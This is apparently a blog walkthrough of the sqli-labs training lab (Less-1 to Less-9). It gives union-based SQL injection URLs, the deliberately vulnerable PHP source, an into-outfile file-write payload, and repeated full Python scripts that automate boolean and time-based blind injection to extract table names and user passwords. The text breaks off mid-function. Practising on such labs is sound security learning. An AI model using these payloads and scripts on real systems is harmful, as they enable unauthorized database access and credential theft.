Lab practice: sqli-labs

Updated: 2023-11-05 17:27:44  Views:  Comments: 0

Published 2023-11-05 (author: 野有蔓草小说)

Lab practice: sqli-labs (SQLi-LABS Page-1 Basic Challenges)

GET

Less-1: easy

1. order by shows that the queried table has three columns

192.168.40.165/sqli-labs-master/Less-1/?id=1' order by 3--+

2. union select gives the database name: security

192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,database(),2--+

3. select group_concat(table_name) from information_schema.tables where table_schema=database() gives the table names: emails,referers,referers,uagents,users

192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())--+

4. select group_concat(column_name) from information_schema.columns where table_name='emails' gives the column names of the table: id,email_id

192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='emails'),database()--+

5. select group_concat(id,email_id) from emails gives the column values:

name:1Dumb@,2Angel@,3Dummy@,4secure@,5stupid@,6superman@,7batman@,8admin@dhakkan.c

192.168.40.165/sqli-labs-master/Less-1/?id=-1' union select 1,(select group_concat(id,email_id) from emails),database()--+

Less-2: easy

In Less-2 "and" unexpectedly stops working, which is baffling, but "order by" still works

There are three columns:

192.168.40.165/sqli-labs-master/Less-2/?id=1 order by 3--+

Current database: security

192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),3--+

Tables in security: _emails,_emails,_referers,_referers,_referers,_uagents,_uagents,_uagents,_uagents,_users,_users,_users

192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),(select group_concat('_',table_name) from information_schema.tables where table_schema=database())--+

Columns of the users table: user_id,first_name,last_name,user,password,avatar,id,username,password

192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_name='users')--+

Column values: DumbDumb,AngelinaI-kill-you,Dummyp@ssword,securecrappy,stupidstupidity,supermangenious,batmanmob!le,adminadmin,admin1admin1,admin2admin2,admin3admin3,dhakkandumbo,admin4admin4

192.168.40.165/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(username,password) from users),(select group_concat(column_name) from information_schema.columns where table_name='users')--+

Less-3: single quote + parenthesis closure

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/TR/xhtml1/DTD/">
<html xmlns="/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Less-3 Error Based- String (with Twist)</title>
</head>

<body bgcolor="#000000">
<div style=" margin-top:60px;color:#FFF; font-size:23px; text-align:center">Welcome   <font color="#FF0000"> Dhakkan </font><br>
<font size="3" color="#FFFF00">

<?php
//including the Mysql connect parameters.
include("../sql-connections/");
error_reporting(0);

// take the variables
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity: the raw request value is spliced into the query between ('...')
    $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo "<font size='5'>";
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font>';
        print_r(mysql_error());
        echo "</font>";
    }
}
else { echo "Please input the ID as parameter with numeric value";}
?>

</font> </div><br><br><br><center>
<img src="../images/" /></center>
</body>
</html>

Source
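As an added example, not taken from the original post or from sqli-labs, the query shape of the Less-3 source above is rebuilt against an in-memory SQLite table with constructed rows, beside the parameterized form a developer would ship instead; sqlite3 stands in for MySQL, and `-- ` plays the role that the writeup's `%23`/`--+` comment plays on the lab.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the lab's users table; the rows are sample data, not the lab's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-one"), (2, "bob", "pw-two")])
    return conn


def lookup_concat(conn, user_id):
    """Mirrors the Less-3 source: the request value is pasted into the SQL text
    between ('...'), so a quote plus parenthesis in the value closes the literal
    and whatever follows is parsed as SQL."""
    sql = "SELECT username, password FROM users WHERE id=('%s') LIMIT 1" % user_id
    return conn.execute(sql).fetchone()


def lookup_param(conn, user_id):
    """Hardened form: the value is bound as a parameter, so it is only ever
    compared against id, whatever characters it contains."""
    sql = "SELECT username, password FROM users WHERE id=(?) LIMIT 1"
    return conn.execute(sql, (user_id,)).fetchone()


def compare(user_id):
    """Run both forms on the same input and return the two results side by side."""
    conn = make_db()
    return {"concat": lookup_concat(conn, user_id),
            "param": lookup_param(conn, user_id)}


if __name__ == "__main__":
    print(compare("1"))                                     # both forms return alice
    print(compare("1') and ('1'='1"))                       # boolean probe: concat true branch
    print(compare("1') and ('1'='0"))                       # boolean probe: concat false branch
    print(compare("-1') UNION SELECT 'injected','x' -- "))  # union shape from Less-3/4
```

With the parameterized query every probe is just a non-numeric id and returns no row, which is also why the boolean and union probes in the later lessons stop producing any observable difference.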

Database: security

192.168.40.165/sqli-labs-master/Less-3/?id=--1') union select 1,2,database() %23

Tables: emails,referers,uagents,users

192.168.40.165/sqli-labs-master/Less-3/?id=--1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() %23

Columns: user_id,first_name,last_name,user,password,avatar,id,username,password

192.168.40.165/sqli-labs-master/Less-3/?id=--1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23

Values: Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

192.168.40.165/sqli-labs-master/Less-3/?id=--1') union select 1,2,group_concat(username) from users %23

Less-4: double quote + parenthesis closure

Double-quote closure: the two requests echo differently

id=1" and "0

id=1" and "1

Parenthesis closure, from the error message: ...use near 'union select 1,2,3 #") LIMIT 0,1' at line 1

192.168.40.165/sqli-labs-master/Less-4/?id=1" union select 1,2,3 %23

192.168.40.165/sqli-labs-master/Less-4/?id=1") union select 1,2,3 %23

Database: security

192.168.40.165/sqli-labs-master/Less-4/?id=-1") union select 1,database(),2 %23

Tables: emails,referers,uagents,users

192.168.40.165/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

Columns: user_id,first_name,last_name,user,password,avatar,id,username,password

192.168.40.165/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'%23

Values: Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4

192.168.40.165/sqli-labs-master/Less-4/?id=-1") union select 1,group_concat(username),3 from users%23

Less-5: blind injection, single-quote closure. I have seen others say error-based injection also works here; I will try it when I have time

A note on one function: at first I used substr to slice the string and could not get it to work however I wrote it, so I used left() instead

LEFT(str,len)

Returns the leftmost len characters of the string str, or NULL if any argument is NULL

SQL> SELECT LEFT('foobarbar', 5);
+----------------------+
| LEFT('foobarbar', 5) |
+----------------------+
| fooba                |
+----------------------+
1 row in set (0.00 sec)

// Original from 易百教程; for commercial reproduction contact the author for permission, for non-commercial reproduction keep the original link: /sql/

'''
@Modify Time      @Author
------------      -------
2019/9/29 13:26   laoalo
'''
import requests
from lxml import etree
import time

tag = "You "
d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,"


def hit(urls):
    '''
    Request urls and return True when the text inside <font size="5"> equals tag,
    i.e. the injected condition evaluated to true; False otherwise.
    '''
    print(urls)
    response = requests.get(urls).text
    htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
    return bool(htmlelmet) and htmlelmet[0] == tag


def database_length():
    '''
    Brute-force the length of the database name
    :return: length of the database name
    '''
    url = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length(database())="
    i = 0
    while True:
        if hit(url + str(i) + '%23'):
            return i
        i += 1


def database_name(length):
    '''
    Brute-force the database name one character at a time with left()
    :param length: length of the database name
    :return: database name
    '''
    database = ""
    for j in range(1, length + 1):
        for i in d:
            urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and left(database()," + str(j) + ")='" + database + i + "'--+"
            if hit(urls):
                database += i
                break
    return database


def table_name_no_ascii(length):
    '''
    Table name without ascii(): walk the dictionary directly; to be refined when there is time
    :param length: length of the first table name
    :return: first table name
    '''
    table = ""
    for j in range(1, length + 1):
        for i in d:
            urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(j) + ",1)='" + i + "'--+"
            if hit(urls):
                table += i
                break
    return table


def table_length():
    '''
    Length of the group_concat of all table names in the current database
    :return: length
    '''
    i = 0
    while True:
        urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=" + str(i) + "--+"
        if hit(urls):
            return i
        i += 1


def table_name(length):
    '''
    Brute-force the table names with ascii()
    :param length: result of table_length()
    :return: table names
    '''
    table = ""
    for j in range(1, length + 1):
        # step i up by 10 until ascii(char) < i
        i = 0
        while i <= 122:
            urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(j) + ",1))<" + str(i) + "--+"
            if hit(urls):
                break
            i += 10
        # now step i down by 1 to pin the exact character
        print("start decrementing")
        while i > 0:
            urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(j) + ",1))=" + str(i) + "--+"
            if hit(urls):
                table += chr(i)
                print('table names=', table)
                break
            i -= 1
    return table


def column_name(length, table_name):
    '''
    Brute-force the column names of a table with ascii()
    :param length: length of the group_concat of the column names
    :param table_name: table to query
    :return: column names
    '''
    table = ""
    for j in range(1, length + 1):
        # step i up by 10 until ascii(char) < i
        i = 0
        while i <= 122:
            urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "')," + str(j) + ",1))<" + str(i) + "--+"
            if hit(urls):
                break
            i += 10
        # now step i down by 1 to pin the exact character
        print("start decrementing")
        while i > 0:
            urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "')," + str(j) + ",1))=" + str(i) + "--+"
            if hit(urls):
                table += chr(i)
                print('column names=', table)
                break
            i -= 1
    return table


def data_length(colums, table):
    '''
    Length of the data
    :param colums: column name
    :param table: table name
    :return: length of the group_concat of the values
    '''
    i = 0
    while i < 1000:
        urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and length((select group_concat(" + colums + ") from " + table + "))=" + str(i) + "--+"
        if hit(urls):
            return i
        i += 1


def data_datail(length, colums, table):
    '''
    Values stored in the table
    :param length: length of the values
    :param colums: column to query
    :param table: table to query
    :return: column values
    '''
    data = ""
    for j in range(1, length + 1):
        for i in d:
            urls = "192.168.40.165/sqli-labs-master/Less-5/?id=1' and left((select group_concat(" + colums + ") from " + table + "), " + str(j) + " )='" + data + i + "'--+"
            if hit(urls):
                data += i
                print(colums, 'values=', data)
                break
    return data

'''
@Modify Time      @Author
------------      -------
2019/9/29 13:26   laoalo
'''
import requests
from lxml import etree
import time

tag = "You "
d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,"


def hit(urls):
    '''
    Request urls and return True when the text inside <font size="5"> equals tag,
    i.e. the injected condition evaluated to true; False otherwise.
    '''
    print(urls)
    response = requests.get(urls).text
    htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
    return bool(htmlelmet) and htmlelmet[0] == tag


def database_length():
    '''
    Brute-force the length of the database name
    :return: length of the database name
    '''
    url = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length(database())='
    i = 0
    while True:
        if hit(url + str(i) + '%23'):
            return i
        i += 1


def database_name(length):
    '''
    Brute-force the database name
    :param length: length of the database name
    :return: database name
    '''
    database = ""
    for j in range(1, length + 1):
        for i in d:
            urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and left(database(),' + str(j) + ')="' + database + i + '"--+'
            if hit(urls):
                database += i
                break
    return database


def table_name_no_ascii(length):
    '''
    Table name without ascii(): walk the dictionary directly; to be refined when there is time
    :param length: length of the first table name
    :return: first table name
    '''
    table = ""
    for j in range(1, length + 1):
        for i in d:
            urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),' + str(j) + ',1)="' + i + '"--+'
            if hit(urls):
                table += i
                break
    return table


def table_length():
    '''
    Length of the group_concat of all table names in the current database
    :return: length
    '''
    i = 0
    while True:
        urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=' + str(i) + '--+'
        if hit(urls):
            return i
        i += 1


def table_name(length):
    '''
    Brute-force the table names with ascii()
    :param length: result of table_length()
    :return: table names
    '''
    table = ""
    for j in range(1, length + 1):
        # step i up by 10 until ascii(char) < i
        i = 0
        while i <= 122:
            urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),' + str(j) + ',1))<' + str(i) + '--+'
            if hit(urls):
                break
            i += 10
        # now step i down by 1 to pin the exact character
        print("start decrementing", end="")
        while i > 0:
            urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),' + str(j) + ',1))=' + str(i) + '--+'
            if hit(urls):
                table += chr(i)
                print('table names=', table)
                break
            i -= 1
    return table


def colums_length(table_name):
    '''
    Length of the column names of the given table
    :param table_name: table name
    :return: length of the group_concat of the column names
    '''
    i = 0
    while i < 1000:
        urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((select group_concat(column_name) from information_schema.columns where table_name="' + table_name + '"))=' + str(i) + '--+'
        if hit(urls):
            return i
        i += 1


def column_name(length, table_name):
    '''
    Brute-force the column names of a table with ascii()
    :param length: result of colums_length()
    :param table_name: table to query
    :return: column names
    '''
    table = ""
    for j in range(1, length + 1):
        # step i up by 10 until ascii(char) < i
        i = 0
        while i <= 122:
            urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="' + table_name + '"),' + str(j) + ',1))<' + str(i) + '--+'
            if hit(urls):
                break
            i += 10
        # now step i down by 1 to pin the exact character
        print("start decrementing", end="")
        while i > 0:
            urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="' + table_name + '"),' + str(j) + ',1))=' + str(i) + '--+'
            if hit(urls):
                table += chr(i)
                print('column names=', table)
                break
            i -= 1
    return table


def data_length(colums, table):
    '''
    Length of the data
    :param colums: column name
    :param table: table name
    :return: length of the group_concat of the values
    '''
    i = 0
    while i < 1000:
        urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and length((select group_concat(' + colums + ') from ' + table + '))=' + str(i) + '--+'
        if hit(urls):
            return i
        i += 1


def data_datail(length, colums, table):
    '''
    Values stored in the table
    :param length: length of the values
    :param colums: column to query
    :param table: table to query
    :return: column values
    '''
    data = ""
    for j in range(1, length + 1):
        for i in d:
            urls = '192.168.40.165/sqli-labs-master/Less-6/?id=1" and left((select group_concat(' + colums + ') from ' + table + '), ' + str(j) + ' )="' + data + i + '"--+'
            if hit(urls):
                data += i
                print(colums, 'values=', data)
                break
    print(data)
    return data


if __name__ == '__main__':
    # print(database_length())  # 8
    # print(database_name(8))  # security
    # print(table_length())  # 90
    # print(table_name(90))  # emails,referers,uagents,users
    # print(colums_length('emails'))  # 11
    # print(column_name(11, 'emails'))  # id,email_id
    # print(data_length('id', 'emails'))  # 15
    print(data_datail(15, 'id', 'emails'))  # id values= 1,2,3,4,5,6,7,8

Blind injection script

Less-7: file upload

id=0 union select 1,@@datadir,@@basedir MYSQL--+

id=1')) union select 1,2,'' into outfile './7' --+

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "/TR/xhtml1/DTD/">
<title>Less-7 Dump into Outfile</title>
Welcome    Dhakkan

<?php
//including the Mysql connect parameters.
include("../sql-connections/");
error_reporting(0);

// take the variables
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    $fp=fopen('','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);

    // connectivity: the raw request value is spliced into the query between (('...'))
    $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);

    if($row)
    {
        echo '<font size="5">';
        echo 'You ';
        echo "<br>";
        echo "</font>";
    }
    else
    {
        echo '<font>';
        echo 'You have an error in your SQL syntax';
        //print_r(mysql_error());
        echo "</font>";
    }
}
else { echo "Please input the ID as parameter with numeric value";}
?>

Source

Your Login name:/var/lib/mysql/

Your Password:/usr/

1. basedir parameter

Explanation: this parameter specifies the MySQL installation path; giving the full path avoids the problems caused by a relative path.

Example: basedir="E:/dev/MySQL/MySQL Server 5.2/" means my MySQL is installed under E:/dev/MySQL/MySQL Server 5.2/.

2. datadir parameter

Explanation: this parameter specifies the path where the MySQL database files are kept, i.e. the MySQL data files.

Example: datadir="E:/dev/MySQL/MySQL Server 5.2/Data/" means my MySQL database files are kept under E:/dev/MySQL/MySQL Server 5.2/Data/.

Less-8: single-quote closure, boolean blind injection (page echo)

Test condition:

Single quote:

id=1' and '1

id=1' and '0

This time I worked on the password column of the users table. Iterating directly produced case-insensitive errors, so I wrote another, ascii-based version that does distinguish case; only later, after looking it up, did I learn that the cause is probably SQL itself not distinguishing case

'''
@Modify Time      @Author
------------      -------
2019/10/4 10:21   laoalo
'''
import requests
from lxml import etree
import time

tag = "You "
d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,-@!"


def hit(urls):
    '''
    Request urls and return True when the text inside <font size="5"> equals tag,
    i.e. the injected condition evaluated to true; False otherwise.
    '''
    print(urls)
    response = requests.get(urls).text
    htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
    return bool(htmlelmet) and htmlelmet[0] == tag


def database_length():
    '''
    Brute-force the length of the database name
    :return: length of the database name
    '''
    url = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length(database())="
    i = 0
    while True:
        if hit(url + str(i) + '%23'):
            return i
        i += 1


def database_name(length):
    '''
    Brute-force the database name
    :param length: length of the database name
    :return: database name
    '''
    database = ""
    for j in range(1, length + 1):
        for i in d:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and left(database()," + str(j) + ")='" + database + i + "'--+"
            if hit(urls):
                database += i
                break
    return database


def table_name_no_ascii(length):
    '''
    Table name without ascii(): walk the dictionary directly; to be refined when there is time
    :param length: length of the first table name
    :return: first table name
    '''
    table = ""
    for j in range(1, length + 1):
        for i in d:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(j) + ",1)='" + i + "'--+"
            if hit(urls):
                table += i
                break
    return table


def table_length():
    '''
    Length of the group_concat of all table names in the current database
    :return: length
    '''
    i = 0
    while True:
        urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=" + str(i) + "--+"
        if hit(urls):
            return i
        i += 1


def table_name(length):
    '''
    Brute-force the table names with ascii()
    :param length: result of table_length()
    :return: table names
    '''
    table = ""
    for j in range(1, length + 1):
        # step i up by 10 until ascii(char) < i
        i = 0
        while i <= 122:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(j) + ",1))<" + str(i) + "--+"
            if hit(urls):
                break
            i += 10
        # now step i down by 1 to pin the exact character
        print("start decrementing")
        while i > 0:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(j) + ",1))=" + str(i) + "--+"
            if hit(urls):
                table += chr(i)
                print('table names=', table)
                break
            i -= 1
    return table


def colums_length(table_name):
    '''
    Length of the column names of the given table
    :param table_name: table name
    :return: length of the group_concat of the column names
    '''
    i = 0
    while i < 1000:
        urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "'))=" + str(i) + "--+"
        if hit(urls):
            return i
        i += 1


def column_name(length, table_name):
    '''
    Brute-force the column names of a table with ascii()
    :param length: result of colums_length()
    :param table_name: table to query
    :return: column names
    '''
    table = ""
    for j in range(1, length + 1):
        # step i up by 10 until ascii(char) < i
        i = 0
        while i <= 122:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "')," + str(j) + ",1))<" + str(i) + "--+"
            if hit(urls):
                break
            i += 10
        # now step i down by 1 to pin the exact character
        print("start decrementing")
        while i > 0:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "')," + str(j) + ",1))=" + str(i) + "--+"
            if hit(urls):
                table += chr(i)
                print('column names=', table)
                break
            i -= 1
    return table


def data_length(colums, table):
    '''
    Length of the data
    :param colums: column name
    :param table: table name
    :return: length of the group_concat of the values
    '''
    i = 0
    while i < 1000:
        urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((select group_concat(" + colums + ") from " + table + "))=" + str(i) + "--+"
        if hit(urls):
            return i
        i += 1


def data_datail(length, colums, table):
    '''
    Values stored in the table, matched with left() (case-insensitive under the default collation)
    :param length: length of the values
    :param colums: column to query
    :param table: table to query
    :return: column values
    '''
    data = ""
    for j in range(1, length + 1):
        for i in d:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and left((select group_concat(" + colums + ") from " + table + "), " + str(j) + " )='" + data + i + "'--+"
            if hit(urls):
                data += i
                print(colums, 'values=', data)
                break
    return data


if __name__ == '__main__':
    # print(table_length())  # 90
    # print(table_name(90))  # emails,referers,uagents,users
    # print(colums_length('users'))  # 70
    # print(column_name(70, 'users'))  # user_id,first_name,last_name,user,password,avatar,id,username,passworduser_id,first_name,last_name,user,password,avatar,id,username,password
    # print(data_length('password', 'users'))  # 96
    print(data_datail(96, 'password', 'users'))  # dumb,i-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4dumb,i-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,ad

All-lowercase version

'''
@Modify Time      @Author
------------      -------
2019/10/4 10:21   laoalo
'''
import requests
from lxml import etree
import time

tag = "You "
d = "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM,-@!"


def hit(urls):
    '''
    Request urls and return True when the text inside <font size="5"> equals tag,
    i.e. the injected condition evaluated to true; False otherwise.
    '''
    print(urls)
    response = requests.get(urls).text
    htmlelmet = etree.HTML(response).xpath('//font[@size="5"]/text()')
    return bool(htmlelmet) and htmlelmet[0] == tag


def database_length():
    '''
    Brute-force the length of the database name
    :return: length of the database name
    '''
    url = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length(database())="
    i = 0
    while True:
        if hit(url + str(i) + '%23'):
            return i
        i += 1


def database_name(length):
    '''
    Brute-force the database name
    :param length: length of the database name
    :return: database name
    '''
    database = ""
    for j in range(1, length + 1):
        for i in d:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and left(database()," + str(j) + ")='" + database + i + "'--+"
            if hit(urls):
                database += i
                break
    return database


def table_name_no_ascii(length):
    '''
    Table name without ascii(): walk the dictionary directly; to be refined when there is time
    :param length: length of the first table name
    :return: first table name
    '''
    table = ""
    for j in range(1, length + 1):
        for i in d:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(j) + ",1)='" + i + "'--+"
            if hit(urls):
                table += i
                break
    return table


def table_length():
    '''
    Length of the group_concat of all table names in the current database
    :return: length
    '''
    i = 0
    while True:
        urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))=" + str(i) + "--+"
        if hit(urls):
            return i
        i += 1


def table_name(length):
    '''
    Brute-force the table names with ascii()
    :param length: result of table_length()
    :return: table names
    '''
    table = ""
    for j in range(1, length + 1):
        # step i up by 10 until ascii(char) < i
        i = 0
        while i <= 122:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(j) + ",1))<" + str(i) + "--+"
            if hit(urls):
                break
            i += 10
        # now step i down by 1 to pin the exact character
        print("start decrementing")
        while i > 0:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())," + str(j) + ",1))=" + str(i) + "--+"
            if hit(urls):
                table += chr(i)
                print('table names=', table)
                break
            i -= 1
    return table


def colums_length(table_name):
    '''
    Length of the column names of the given table
    :param table_name: table name
    :return: length of the group_concat of the column names
    '''
    i = 0
    while i < 1000:
        urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "'))=" + str(i) + "--+"
        if hit(urls):
            return i
        i += 1


def column_name(length, table_name):
    '''
    Brute-force the column names of a table with ascii()
    :param length: result of colums_length()
    :param table_name: table to query
    :return: column names
    '''
    table = ""
    for j in range(1, length + 1):
        # step i up by 10 until ascii(char) < i
        i = 0
        while i <= 122:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "')," + str(j) + ",1))<" + str(i) + "--+"
            if hit(urls):
                break
            i += 10
        # now step i down by 1 to pin the exact character
        print("start decrementing")
        while i > 0:
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "')," + str(j) + ",1))=" + str(i) + "--+"
            if hit(urls):
                table += chr(i)
                print('column names=', table)
                break
            i -= 1
    return table


def data_length(colums, table):
    '''
    Length of the data
    :param colums: column name
    :param table: table name
    :return: length of the group_concat of the values
    '''
    i = 0
    while i < 1000:
        urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and length((select group_concat(" + colums + ") from " + table + "))=" + str(i) + "--+"
        if hit(urls):
            return i
        i += 1


def data_datail(length, colums, table):
    '''
    Values stored in the table, matched by ascii code so that case is preserved
    :param length: length of the values
    :param colums: column to query
    :param table: table to query
    :return: column values
    '''
    data = ""
    for j in range(1, length + 1):
        for i in range(32, 128):
            urls = "192.168.40.165/sqli-labs-master/Less-8/?id=1' and ascii(substring((select group_concat(" + colums + ") from " + table + ")," + str(j) + ",1))=" + str(i) + "--+"
            if hit(urls):
                data += chr(i)
                print(colums, 'values=', data)
                break
    # print(data)
    return data


if __name__ == '__main__':
    # print(table_length())
    # print(table_name(90))
    # print(colums_length('users'))
    # print(column_name(70, 'users'))
    # print(data_length('password', 'users'))
    print(data_datail(96, 'password', 'users'))

Correct version

Less-9: time-based blind injection + single-quote closure

Single quote + time-based blind:

id=1' and sleep(3)--+

'''
@Modify Time      @Author
------------      -------
2019/10/2 20:04   laoalo
'''
# -*- coding:utf-8 -*-
import requests
import time

url = "192.168.40.165/sqli-labs-master/Less-9/?id=1'"


def delayed(sql):
    '''
    Send sql and return True when the answer took longer than 3 s, i.e. sleep(3) fired.
    requests gives up after 3 s, so a timeout also counts as a delayed answer.
    '''
    s_time = time.time()
    try:
        requests.get(url=sql, timeout=3)
    except requests.exceptions.Timeout:
        return True
    e_time = time.time()
    return (e_time - s_time) > 3


def database_length():
    # the first i for which length(database())>i is false makes the server sleep
    for i in range(1, 10000):
        sql = url + " and if((select length(database()))>" + str(i) + ",0,sleep(3)) +--+"
        print(sql)
        if delayed(sql):
            print("database length:", i)
            return i


def database_name(database_length):
    sql = url + " and if(ascii(substr((select database()),{num},1))>{asc},0,sleep(3)) +--+"
    db_name = ''
    for num in range(1, database_length + 1):
        for asc in range(ord('a'), ord('z') + 1):
            if delayed(sql.format(num=num, asc=asc)):
                db_name += chr(asc)
                print("database name:", db_name)
                break
    return db_name


def table_length(database_name):
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(table_name) from information_schema.tables where table_schema='" + database_name + "')))>" + str(i) + ",0,sleep(3)) +--+"
        print(sql)
        if delayed(sql):
            print(database_name, "length of all table names:", i)
            return i


def table_name(table_length, database_name):
    sql = url + " and if(ascii(substr((select group_concat(table_name separator '@') from information_schema.tables where table_schema='" + database_name + "'),{num},1))>{asc},0,sleep(3)) +--+"
    table_name = ''
    for num in range(1, table_length + 1):
        for asc in range(32, 128):
            if delayed(sql.format(num=num, asc=asc)):
                table_name += chr(asc)
                print("all table names:", table_name)
                break
    return table_name


def column_length(table_name, database_name):
    for i in range(1, 10000):
        sql = url + " and if((select length((select group_concat(column_name) from information_schema.columns where table_name='" + table_name + "' and table_schema='" + database_name + "')))>" + str(i) + ",0,sleep(3)) +--+"
        # print(sql)
        if delayed(sql):
            print(table_name, "length of all column names:", i)
            return i


def column_name(column_length, table_name, database_name):
